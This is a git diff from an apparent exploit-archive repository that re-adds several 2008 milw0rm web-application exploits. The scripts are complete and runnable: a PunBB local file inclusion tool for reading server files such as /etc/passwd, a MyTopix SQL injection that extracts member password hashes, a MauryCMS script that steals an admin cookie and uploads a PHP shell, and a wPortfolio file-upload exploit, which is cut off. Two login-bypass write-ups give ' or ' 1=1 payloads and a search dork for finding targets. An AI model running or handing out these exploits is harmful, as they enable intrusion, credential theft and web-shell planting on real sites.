-      exit;
-    }
-    
-    if(!socket_connect($socket,$host,80))
-    {
-      echo "socket_connect() error!\r\n";
-      exit;
-    }
-    if(!socket_write($socket,$data,strlen($data)))
-    {
-      echo "socket_write() errror!\r\n";
-      exit;
-    }
-  
-    while($get = socket_read($socket,1024,PHP_NORMAL_READ)) 
-    { 
-      $content .= $get; 
-    }
-
-    socket_close($socket);
-  
-   
-   $array = array(
-                 'HTTP/1.1 404 Not Found',
-                 'HTTP/1.1 300 Multiple Choices',
-                 'HTTP/1.1 301 Moved Permanently',
-                 'HTTP/1.1 302 Found',
-                 'HTTP/1.1 304 Not Modified',
-                 'HTTP/1.1 400 Bad Request',
-                 'HTTP/1.1 401 Unauthorized',
-                 'HTTP/1.1 402 Payment Required',
-                 'HTTP/1.1 403 Forbidden',
-                 'HTTP/1.1 405 Method Not Allowed',
-                 'HTTP/1.1 406 Not Acceptable',
-                 'HTTP/1.1 407 Proxy Authentication Required',
-                 'HTTP/1.1 408 Request Timeout',
-                 'HTTP/1.1 409 Conflict',
-                 'HTTP/1.1 410 Gone',
-                 'HTTP/1.1 411 Length Required',
-                 'HTTP/1.1 412 Precondition Failed',
-                 'HTTP/1.1 413 Request Entity Too Large',
-                 'HTTP/1.1 414 Request-URI Too Long',
-                 'HTTP/1.1 415 Unsupported Media Type',
-                 'HTTP/1.1 416 Request Range Not Satisfiable',
-                 'HTTP/1.1 417 Expectation Failed',
-                 'HTTP/1.1 Retry With',
-                );
-                
-               
-    for($i=0;$i<=count($array);$i++)
-   
-    if(eregi($array[$i],$content)) 
-    {
-      return ("$array[$i]\r\n");
-      break;
-    } 
-    else 
-    {
-      return ("$content\r\n");
-      break;
-    }
-  }
-     
-  
-  function is_vulnerable($host)
-  {
-    $host = explode('/',$host);
-    
-    $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
-    $header .= "Host: $host[0]\r\n";
-    $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
-    $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
-    $header .= "Accept-Language: en-us,en;q=0.5\r\n";
-    $header .= "Accept-Encoding: gzip,deflate\r\n";
-    $header .= "Connection: close\r\n\r\n";
-    
-    if(stristr($this->http_request($host[0],$header),"\\'"))
-    {  
-      echo "[+] Magic Quotes GPC/Register Globals On!\n";
-      echo "[+] Exploit Failed!\n";
-      exit;
-    }
-    else
-    {
-      return false;
-    }
-  }
-  
-  function starting()
-  {
-   
-    global $argv;
-    
-    if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
-    {
-    
-      echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
-      echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
-      echo "    -----------------------------------------------------------\r\n";
-      echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
-      echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
-      echo "[+] Usage: php $argv[0] [host/path]        \r\n";
-      exit;
-    
-    }
-  }
-  
-  function exploiting($host,$mode)
-  {
-    
-    $host = explode('/',$host);
-    $i = 0;
-    
-    
-    echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
-    echo "[+] Local File: ";
-    
-    $file = stripslashes(trim(fgets(STDIN)));
-    
-    if(empty($file)) die("you fail");
-    
-    
-    $array = array (
-                    "functions_navlinks.php?pun_user[language]=$file",
-                    "profile_send.php?pun_user[language]=$file",
-                    "viewtopic_PM-link.php?pun_user[language]=$file",
-                    "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
-                  ); 
-
-    $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
-    $write .= "Host: $host[0]\r\n";
-    $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
-    $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
-    $write .= "Accept-Language: en-us,en;q=0.5\r\n";
-    $write .= "Accept-Encoding: gzip,deflate\r\n";
-    $write .= "Connection: close\r\n\r\n";
-    
-
-   
-    
-    if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
-    {
-      $i++;
-    }
-    else
-    {
-      if($mode == "save") 
-      {
-   
-        $rand = rand(0,99999);
-        fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
-        
-        echo "[+] File $rand Saved Successfully!\r\n";
-        echo "[+] Exploit Terminated!\r\n";
-        exit;
-      
-      }
-      else
-      {
-        echo $this->http_request($host[0],$write);
-        exit;
-      }
-    }
-  }
-}
-
-# milw0rm.com [2008-11-19]
+starting();
+$exploit->is_vulnerable($domain);
+$exploit->exploiting($domain,$mymode);
+
+ 
+
+class Exploit
+{
+  
+  function http_request($host,$data) 
+  {   
+   
+    if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) 
+    {
+       echo "socket_create() error!\r\n";
+       exit;
+    }
+    if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
+    { 
+      echo "socket_set_option() error!\r\n";
+      exit;
+    }
+    
+    if(!socket_connect($socket,$host,80))
+    {
+      echo "socket_connect() error!\r\n";
+      exit;
+    }
+    if(!socket_write($socket,$data,strlen($data)))
+    {
+      echo "socket_write() errror!\r\n";
+      exit;
+    }
+  
+    while($get = socket_read($socket,1024,PHP_NORMAL_READ)) 
+    { 
+      $content .= $get; 
+    }
+
+    socket_close($socket);
+  
+   
+   $array = array(
+                 'HTTP/1.1 404 Not Found',
+                 'HTTP/1.1 300 Multiple Choices',
+                 'HTTP/1.1 301 Moved Permanently',
+                 'HTTP/1.1 302 Found',
+                 'HTTP/1.1 304 Not Modified',
+                 'HTTP/1.1 400 Bad Request',
+                 'HTTP/1.1 401 Unauthorized',
+                 'HTTP/1.1 402 Payment Required',
+                 'HTTP/1.1 403 Forbidden',
+                 'HTTP/1.1 405 Method Not Allowed',
+                 'HTTP/1.1 406 Not Acceptable',
+                 'HTTP/1.1 407 Proxy Authentication Required',
+                 'HTTP/1.1 408 Request Timeout',
+                 'HTTP/1.1 409 Conflict',
+                 'HTTP/1.1 410 Gone',
+                 'HTTP/1.1 411 Length Required',
+                 'HTTP/1.1 412 Precondition Failed',
+                 'HTTP/1.1 413 Request Entity Too Large',
+                 'HTTP/1.1 414 Request-URI Too Long',
+                 'HTTP/1.1 415 Unsupported Media Type',
+                 'HTTP/1.1 416 Request Range Not Satisfiable',
+                 'HTTP/1.1 417 Expectation Failed',
+                 'HTTP/1.1 Retry With',
+                );
+                
+               
+    for($i=0;$i<=count($array);$i++)
+   
+    if(eregi($array[$i],$content)) 
+    {
+      return ("$array[$i]\r\n");
+      break;
+    } 
+    else 
+    {
+      return ("$content\r\n");
+      break;
+    }
+  }
+     
+  
+  function is_vulnerable($host)
+  {
+    $host = explode('/',$host);
+    
+    $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
+    $header .= "Host: $host[0]\r\n";
+    $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
+    $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+    $header .= "Accept-Language: en-us,en;q=0.5\r\n";
+    $header .= "Accept-Encoding: gzip,deflate\r\n";
+    $header .= "Connection: close\r\n\r\n";
+    
+    if(stristr($this->http_request($host[0],$header),"\\'"))
+    {  
+      echo "[+] Magic Quotes GPC/Register Globals On!\n";
+      echo "[+] Exploit Failed!\n";
+      exit;
+    }
+    else
+    {
+      return false;
+    }
+  }
+  
+  function starting()
+  {
+   
+    global $argv;
+    
+    if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
+    {
+    
+      echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
+      echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
+      echo "    -----------------------------------------------------------\r\n";
+      echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
+      echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
+      echo "[+] Usage: php $argv[0] [host/path]        \r\n";
+      exit;
+    
+    }
+  }
+  
+  function exploiting($host,$mode)
+  {
+    
+    $host = explode('/',$host);
+    $i = 0;
+    
+    
+    echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
+    echo "[+] Local File: ";
+    
+    $file = stripslashes(trim(fgets(STDIN)));
+    
+    if(empty($file)) die("you fail");
+    
+    
+    $array = array (
+                    "functions_navlinks.php?pun_user[language]=$file",
+                    "profile_send.php?pun_user[language]=$file",
+                    "viewtopic_PM-link.php?pun_user[language]=$file",
+                    "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
+                  ); 
+
+    $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
+    $write .= "Host: $host[0]\r\n";
+    $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
+    $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+    $write .= "Accept-Language: en-us,en;q=0.5\r\n";
+    $write .= "Accept-Encoding: gzip,deflate\r\n";
+    $write .= "Connection: close\r\n\r\n";
+    
+
+   
+    
+    if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
+    {
+      $i++;
+    }
+    else
+    {
+      if($mode == "save") 
+      {
+   
+        $rand = rand(0,99999);
+        fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
+        
+        echo "[+] File $rand Saved Successfully!\r\n";
+        echo "[+] Exploit Terminated!\r\n";
+        exit;
+      
+      }
+      else
+      {
+        echo $this->http_request($host[0],$write);
+        exit;
+      }
+    }
+  }
+}
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7160.php b/platforms/php/webapps/7160.php
index 677982c49..251d8d9ee 100755
--- a/platforms/php/webapps/7160.php
+++ b/platforms/php/webapps/7160.php
@@ -1,148 +1,148 @@
- evil	= '';
-		$this -> socket	= socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-		$this -> inj	= '-1+UNION+SELECT+concat(members_name,0x3a,members_pass)+FROM+my_members+WHERE+members_id=2--';
-	}
-
-	private function send($packet)
-	{
-		if(!$this -> socket) $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-
-		socket_connect($this -> socket, gethostbyname($this -> host), 80) or die("[-] Couldn't connect with specified host\r\n");
-		socket_write($this -> socket, $packet, strlen($packet)) or die("[-] Couldn't send requrested packet\r\n");
-
-		while($resp = socket_read($this -> socket, 2048)) $output .= $resp;
-
-		socket_shutdown($this -> socket, 2);
-		socket_close($this -> socket);
-		unset($this -> socket);
-
-		return $output;	
-	}
-
-	public function target($host, $path)
-	{
-		$this -> host = (substr($host, 0, 7) === 'http://') ? substr($host, 7) : $host;
-		$this -> path = (substr($path, -1) === '/') ? substr($path, 0, -1) : $path;
-	}
-
-	public function usage()
-	{
-		return "[~] Usage : php mytopix130-sql.php    \r\n\r\n";
-	}
-
-	public function login($login, $password)
-	{
-		$post = "username=$login&password=$password&hash=5aaaea2d9cd5b549a857e02190cb4542";
-		$this -> evil = 
-			"POST {$this -> path}/index.php?a=logon&CODE=01 HTTP/1.1\r\n" .
-			"Host: {$this -> host}\r\n" .
-			"Referer: http://{$this -> host}{$this -> path}\r\n" . 
-			"User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" .
-			"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*#/*;q=0.8\r\n" .
-			"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" .
-			"Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" .
-			"Connection: Close\r\n" . 
-			"Content-Type: application/x-www-form-urlencoded\r\n" .
-			"Content-length: " . strlen($post) . "\r\n\r\n$post";
-
-		return $this -> send($this -> evil);
-	}
-
-	public function inject($cid, $cpass)
-	{
-		$this -> evil =
-			"GET {$this->path}/index.php?a=notes&CODE=07&send=$this->inj HTTP/1.1\r\n" . 
-			"Host: {$this->host}\r\n" . 
-			"Referer: http://{$this->host}{$this->path}/\r\n" . 
-			"User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" .
-			"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" . 
-			"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" . 
-			"Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" . 
-			"Cookie: my_id={$cid}; my_pass={$cpass}\r\n" . 
-			"Connection: close\r\n\r\n";
-
-		return $this -> send($this -> evil);
-	}
-}; 
-
-
-$xpl = new MyTopixSploit();
-
-echo <<< HEADER
-
-+--------------------------------------------------------------------------+
-|                                                                          |
-|        MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit        |
-|        ==========================================================        |
-|        Author ......................................... cOndemned        |
-|        Contact ...................... digital_future[at]p2[dot]pl        |
-|        Conditions ......................... Need account on forum        |
-|                                                                          |
-+--------------------------------------------------------------------------+
-
-
-HEADER;
-
-if($argc != 5) 
-	echo $xpl -> usage();
-else 
-{
-	list($script, $host, $path, $login, $password) = $argv;
-	
-	$xpl -> target($host, $path);
-	$head = $xpl -> login($login, $password);
-	
-	printf("[~] Trying to login with nick: %s, and password: %s...\r\n", $login, $password);
-
-	$cookie['USERID'] = preg_match_all('!id=([0-9]+);!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user id\r\n");
-	$cookie['PASSWD'] = preg_match_all('!pass=([a-f0-9]{32});!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user password\r\n");
-	
-	$src = $xpl -> inject($cookie['USERID'], $cookie['PASSWD']);
-	
-	printf("[~] Sending packet ...\r\n");
-
-	$resp = preg_match_all("!value='([a-z0-9]+?):([a-f0-9]+?)'!is", $src, $out) 
-		? "[+] Login: {$out[1][0]}\r\n[+] Pass: {$out[2][0]}" : "[-] Exploitation failed";
-
-	printf("[~] Done...\r\n%s \r\n\r\n", $resp);
-}
-
-?>
-
-# milw0rm.com [2008-11-19]
+ evil	= '';
+		$this -> socket	= socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+		$this -> inj	= '-1+UNION+SELECT+concat(members_name,0x3a,members_pass)+FROM+my_members+WHERE+members_id=2--';
+	}
+
+	private function send($packet)
+	{
+		if(!$this -> socket) $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+
+		socket_connect($this -> socket, gethostbyname($this -> host), 80) or die("[-] Couldn't connect with specified host\r\n");
+		socket_write($this -> socket, $packet, strlen($packet)) or die("[-] Couldn't send requrested packet\r\n");
+
+		while($resp = socket_read($this -> socket, 2048)) $output .= $resp;
+
+		socket_shutdown($this -> socket, 2);
+		socket_close($this -> socket);
+		unset($this -> socket);
+
+		return $output;	
+	}
+
+	public function target($host, $path)
+	{
+		$this -> host = (substr($host, 0, 7) === 'http://') ? substr($host, 7) : $host;
+		$this -> path = (substr($path, -1) === '/') ? substr($path, 0, -1) : $path;
+	}
+
+	public function usage()
+	{
+		return "[~] Usage : php mytopix130-sql.php    \r\n\r\n";
+	}
+
+	public function login($login, $password)
+	{
+		$post = "username=$login&password=$password&hash=5aaaea2d9cd5b549a857e02190cb4542";
+		$this -> evil = 
+			"POST {$this -> path}/index.php?a=logon&CODE=01 HTTP/1.1\r\n" .
+			"Host: {$this -> host}\r\n" .
+			"Referer: http://{$this -> host}{$this -> path}\r\n" . 
+			"User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" .
+			"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*#/*;q=0.8\r\n" .
+			"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" .
+			"Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" .
+			"Connection: Close\r\n" . 
+			"Content-Type: application/x-www-form-urlencoded\r\n" .
+			"Content-length: " . strlen($post) . "\r\n\r\n$post";
+
+		return $this -> send($this -> evil);
+	}
+
+	public function inject($cid, $cpass)
+	{
+		$this -> evil =
+			"GET {$this->path}/index.php?a=notes&CODE=07&send=$this->inj HTTP/1.1\r\n" . 
+			"Host: {$this->host}\r\n" . 
+			"Referer: http://{$this->host}{$this->path}/\r\n" . 
+			"User-Agent: Opera/9.62 (X11; Linux i686; U; pl) Presto/2.1.1\r\n" .
+			"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" . 
+			"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" . 
+			"Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n" . 
+			"Cookie: my_id={$cid}; my_pass={$cpass}\r\n" . 
+			"Connection: close\r\n\r\n";
+
+		return $this -> send($this -> evil);
+	}
+}; 
+
+
+$xpl = new MyTopixSploit();
+
+echo <<< HEADER
+
++--------------------------------------------------------------------------+
+|                                                                          |
+|        MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit        |
+|        ==========================================================        |
+|        Author ......................................... cOndemned        |
+|        Contact ...................... digital_future[at]p2[dot]pl        |
+|        Conditions ......................... Need account on forum        |
+|                                                                          |
++--------------------------------------------------------------------------+
+
+
+HEADER;
+
+if($argc != 5) 
+	echo $xpl -> usage();
+else 
+{
+	list($script, $host, $path, $login, $password) = $argv;
+	
+	$xpl -> target($host, $path);
+	$head = $xpl -> login($login, $password);
+	
+	printf("[~] Trying to login with nick: %s, and password: %s...\r\n", $login, $password);
+
+	$cookie['USERID'] = preg_match_all('!id=([0-9]+);!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user id\r\n");
+	$cookie['PASSWD'] = preg_match_all('!pass=([a-f0-9]{32});!is', $head, $tmp) ? $tmp[1][0] : die("[-] Couldn't retrive user password\r\n");
+	
+	$src = $xpl -> inject($cookie['USERID'], $cookie['PASSWD']);
+	
+	printf("[~] Sending packet ...\r\n");
+
+	$resp = preg_match_all("!value='([a-z0-9]+?):([a-f0-9]+?)'!is", $src, $out) 
+		? "[+] Login: {$out[1][0]}\r\n[+] Pass: {$out[2][0]}" : "[-] Exploitation failed";
+
+	printf("[~] Done...\r\n%s \r\n\r\n", $resp);
+}
+
+?>
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7162.pl b/platforms/php/webapps/7162.pl
index 15a2b37de..59f654481 100755
--- a/platforms/php/webapps/7162.pl
+++ b/platforms/php/webapps/7162.pl
@@ -1,108 +1,108 @@
-#!/usr/bin/perl 
-
-=about
- 
-   MauryCMS <= 0.53.2 Remote Shell Upload Exploit
-   ----------------------------------------------
-   by athos - staker[at]hotmail[dot]it
-   download on http://cms.maury91.org
-   thnx Osirys
-   
-=cut
-
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-
-my ($http,$post,$user,$pass,@auth,@read,$shell);
-
-my $host = shift @ARGV;
-my $file = shift @ARGV or &usage;
-
-open(FILE,$file) or die("file error!\n");
-
-@read = ;
-
-foreach(@read) 
-{
-  $shell .= $_;
-}
-
-close(FILE);
-
-&usage if $host !~ /http:\/\/(.+?)$/i && $file !~ /[a-zA-Z](\.php)/i;
-
-
-my @path = split /\//,substr($host,7);
-
-
-$http = new LWP::UserAgent(
-                            agent => "Mozilla/4.5 [en] (Win95; U)",
-                          );
-
-@auth = split(':',get_cookies());
-
-if(not defined($path[1]))
-{
-  $user = qq{_nick=${auth[1]}; path=/; };
-  $pass = qq{_sauth=${auth[0]}; path=/;};
-}
-else
-{
-  $user = qq{/${path[1]}_nick=${auth[1]}; path=/; };
-  $pass = qq{/${path[1]}_sauth=${auth[0]}; path=/;};
-}
-
-
-
-$http->default_header('Cookie' => $user.$pass);
-
-$post = $http->post($host.'/Admin.php',[
-                                         'zone'     => 'Modify',
-                                         'txtfname' => $file,
-                                         'txttext'  => $shell,
-                                       ]);               
-
-if($post->is_success  && $post->as_string =~ /File Scritto/i)
-{
-  print STDOUT "Exploit Successfully!\n";
-  print STDOUT "$host/$file\n";
-  exit;
-}
-else
-{
-  print STDOUT "Exploit Failed!\n";
-  exit;
-}
-
-
-sub get_cookies
-{
-  my ($query,$cookie,$content);
-
-  $query = "/Rss.php?c=-1+union+select+1,concat(sauth,0x3a,nick),".
-           "3,4,5,6,7,8,9+from+mcms_users+where+id=1--";
-              
- 
-  $cookie = $http->get($host.$query);
-  $content = $cookie->content;
- 
-  if($cookie->is_success & $content =~ /(.+?)<\/title>/i)
-  {
-    return $1;
-  }
-}
-
-
-sub usage
-{
-  print STDOUT "MauryCMS <= 0.53.2 Remote Shell Upload Exploit\n".
-               "by athos - staker[at]hotmail[dot]it\n".
-               "----------------------------------------------\n".
-               "Usage: perl $0 http://[host] [name_shell.php]\n".
-               "Usage: perl $0 http://localhost/cms shell.php\n";
-  exit;
-}
-
-# milw0rm.com [2008-11-19]
+#!/usr/bin/perl 
+
+=about
+ 
+   MauryCMS <= 0.53.2 Remote Shell Upload Exploit
+   ----------------------------------------------
+   by athos - staker[at]hotmail[dot]it
+   download on http://cms.maury91.org
+   thnx Osirys
+   
+=cut
+
+
+use strict;
+use warnings;
+use LWP::UserAgent;
+
+my ($http,$post,$user,$pass,@auth,@read,$shell);
+
+my $host = shift @ARGV;
+my $file = shift @ARGV or &usage;
+
+open(FILE,$file) or die("file error!\n");
+
+@read = <FILE>;
+
+foreach(@read) 
+{
+  $shell .= $_;
+}
+
+close(FILE);
+
+&usage if $host !~ /http:\/\/(.+?)$/i && $file !~ /[a-zA-Z](\.php)/i;
+
+
+my @path = split /\//,substr($host,7);
+
+
+$http = new LWP::UserAgent(
+                            agent => "Mozilla/4.5 [en] (Win95; U)",
+                          );
+
+@auth = split(':',get_cookies());
+
+if(not defined($path[1]))
+{
+  $user = qq{_nick=${auth[1]}; path=/; };
+  $pass = qq{_sauth=${auth[0]}; path=/;};
+}
+else
+{
+  $user = qq{/${path[1]}_nick=${auth[1]}; path=/; };
+  $pass = qq{/${path[1]}_sauth=${auth[0]}; path=/;};
+}
+
+
+
+$http->default_header('Cookie' => $user.$pass);
+
+$post = $http->post($host.'/Admin.php',[
+                                         'zone'     => 'Modify',
+                                         'txtfname' => $file,
+                                         'txttext'  => $shell,
+                                       ]);               
+
+if($post->is_success  && $post->as_string =~ /File Scritto/i)
+{
+  print STDOUT "Exploit Successfully!\n";
+  print STDOUT "$host/$file\n";
+  exit;
+}
+else
+{
+  print STDOUT "Exploit Failed!\n";
+  exit;
+}
+
+
+sub get_cookies
+{
+  my ($query,$cookie,$content);
+
+  $query = "/Rss.php?c=-1+union+select+1,concat(sauth,0x3a,nick),".
+           "3,4,5,6,7,8,9+from+mcms_users+where+id=1--";
+              
+ 
+  $cookie = $http->get($host.$query);
+  $content = $cookie->content;
+ 
+  if($cookie->is_success & $content =~ /<title>(.+?)<\/title>/i)
+  {
+    return $1;
+  }
+}
+
+
+sub usage
+{
+  print STDOUT "MauryCMS <= 0.53.2 Remote Shell Upload Exploit\n".
+               "by athos - staker[at]hotmail[dot]it\n".
+               "----------------------------------------------\n".
+               "Usage: perl $0 http://[host] [name_shell.php]\n".
+               "Usage: perl $0 http://localhost/cms shell.php\n";
+  exit;
+}
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7163.txt b/platforms/php/webapps/7163.txt
index 16dfb53a8..475ccbd0a 100755
--- a/platforms/php/webapps/7163.txt
+++ b/platforms/php/webapps/7163.txt
@@ -1,26 +1,26 @@
-###############################################################################################
-[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability
-[+] Script home : http://www.revsense.com/
-[-] Discovered By : d3b4g        
-[-] Greetz : str0ke /* All my freind         
-################################################################################################
- 
- Dork:Powered by Revsense
-
- Go to www.target.com/index.php?section=user&action=login
-
- Use following information to bypass login.
-
- Write any email Address as email address.It must to be in email format.
-
- For exapmple bla@bla.com
-
- For password use ' or ' 1=1
-
- Live demo [at] http://demo.revsense.com/index.php?section=user&action=login
---------------------------------------------
---------------------------------------------
-I'm a maldivian 
-/*
-
-# milw0rm.com [2008-11-19]
+###############################################################################################
+[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability
+[+] Script home : http://www.revsense.com/
+[-] Discovered By : d3b4g        
+[-] Greetz : str0ke /* All my freind         
+################################################################################################
+ 
+ Dork:Powered by Revsense
+
+ Go to www.target.com/index.php?section=user&action=login
+
+ Use following information to bypass login.
+
+ Write any email Address as email address.It must to be in email format.
+
+ For exapmple bla@bla.com
+
+ For password use ' or ' 1=1
+
+ Live demo [at] http://demo.revsense.com/index.php?section=user&action=login
+--------------------------------------------
+--------------------------------------------
+I'm a maldivian 
+/*
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7164.txt b/platforms/php/webapps/7164.txt
index e240182d1..ae5baa15c 100755
--- a/platforms/php/webapps/7164.txt
+++ b/platforms/php/webapps/7164.txt
@@ -1,42 +1,42 @@
-[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ 
-[~]Tybe: (Auth Bypass) SQL Injection Vulnerability 
-
-[~]Vendor:http://www.preproject.com/preaspjobboard.asp
-
-[~]Software: PRE JOB BOARD
-
-[~]author: R3d-D3v!L 
-
-[~] Date: 21.11.2008 
-
-[~] Home: www.ahacker.biz 
-
-[~] contact: N/A 
-[~] ----------------------------------------------------------- 
-
-
-[~] Exploit: 
-
-username: r0' or ' 1=1-- 
-password: r0' or ' 1=1-- 
-
-
-[~] login for demo: 
-
-http://preproject.com/preaspjobboard//Employee/emp_login.asp
-
-
-[~]-------------------------------------------------------------------------------- 
-[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker 
-[~] 
-[~]spechial thanks : dolly & 7am3m & عماد ,الزهيري 
-[~] 
-[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion 
-[~] 
-[~] & xp10.biz & ahacker.biz
-[~] 
-[~]--------------------------------------------------------------------------------
-
-
-
-# milw0rm.com [2008-11-19]
+[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ 
+[~]Tybe: (Auth Bypass) SQL Injection Vulnerability 
+
+[~]Vendor:http://www.preproject.com/preaspjobboard.asp
+
+[~]Software: PRE JOB BOARD
+
+[~]author: R3d-D3v!L 
+
+[~] Date: 21.11.2008 
+
+[~] Home: www.ahacker.biz 
+
+[~] contact: N/A 
+[~] ----------------------------------------------------------- 
+
+
+[~] Exploit: 
+
+username: r0' or ' 1=1-- 
+password: r0' or ' 1=1-- 
+
+
+[~] login for demo: 
+
+http://preproject.com/preaspjobboard//Employee/emp_login.asp
+
+
+[~]-------------------------------------------------------------------------------- 
+[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker 
+[~] 
+[~]spechial thanks : dolly & 7am3m & عماد ,الزهيري 
+[~] 
+[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion 
+[~] 
+[~] & xp10.biz & ahacker.biz
+[~] 
+[~]--------------------------------------------------------------------------------
+
+
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7165.pl b/platforms/php/webapps/7165.pl
index 26de97a75..3e1cc6216 100755
--- a/platforms/php/webapps/7165.pl
+++ b/platforms/php/webapps/7165.pl
@@ -1,74 +1,74 @@
-#!/usr/bin/perl
-
-# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit
-# Script Name: wPortfolio 0.3
-# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070
-# Vulnerability: Arbitrary File Upload
-# Vulnerable page: /admin/upload_form.php
-# * You can upload everything you want, why not a php shell? ^^
-# Author: Osirys
-# Contact: osirys[at]live[dot]it
-# Proud to be Italian 
-# Thx: athos
-
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-my $path        = "/admin/upload_form.php";
-my $d_fold      = "/admin/tmp/"; 
-my($host,$file) = ($ARGV[0],$ARGV[1]);
-
-($host,$file) || help("-1");
-cheek($host) == 1 || help("-2");
-&banner;
-my $url = $host.$path;
-
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url,
-                      Content_Type => 'form-data',
-                      Content      => [file_to_upload => [$file]] 
-                      );
-
-if ($re->is_success) {
-    print "[+] Uploaded ! \n";
-    print "[+] Link: ".$host.$d_fold.$file." \n";
-}
-else {
-    print "[-] Upload failed ! \n";
-}
-
-sub cheek() {
-    my $host = $_[0];
-    if ($host =~ /http:\/\/(.*)/) {
-        return 1;
-    }
-    else {
-        return 0;
-    }
-}
-
-sub banner {
-    print "\n".
-          "  ========================================== \n".
-          "     wPortfolio 0.3 Arbitrary File Upload \n".
-          "     Author: Osirys \n".
-          "     osirys[at]live[dot]it \n".
-          "     Proud to be italian \n".
-          "  ========================================== \n\n";
-}
-
-sub help() {
-    my $error = $_[0];
-    if ($error == -1) {
-        &banner;
-        print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n";
-    }
-    elsif ($error == -2) {
-        &banner;
-        print "\n[-] Bad hostname address !\n";
-    }
-    print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n";
-    exit(0);
-}
-
-# milw0rm.com [2008-11-19]
+#!/usr/bin/perl
+
+# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit
+# Script Name: wPortfolio 0.3
+# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070
+# Vulnerability: Arbitrary File Upload
+# Vulnerable page: /admin/upload_form.php
+# * You can upload everything you want, why not a php shell? ^^
+# Author: Osirys
